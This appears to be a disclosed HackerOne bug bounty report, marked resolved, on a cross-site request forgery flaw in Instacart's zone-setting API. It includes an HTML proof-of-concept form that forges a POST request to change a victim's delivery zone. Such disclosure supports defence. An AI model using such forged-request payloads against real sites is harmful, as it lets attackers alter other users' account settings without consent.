Cross-Site Request Forgery (CSRF)

Disclosed: 2016-10-13 20:21:53 By malcolmx To instacart
Unknown
Vulnerability Details
Hello, i found Cross-Site Request Forgery (CSRF) that can change any user ZONE POC: ``` <html> <body> <form action="https://admin.instacart.com/api/v2/zones" method="POST"> <input type="hidden" name="zip" value="10001" /> <input type="hidden" name="override" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` put Zone you want send the request to any user and you will change his Zone __Please Watch My POC I Attached For More Details__ Thanks
Actions
View on HackerOne
Report Stats
  • Report ID: 157993
  • State: Closed
  • Substate: resolved
  • Upvotes: 32
Share this report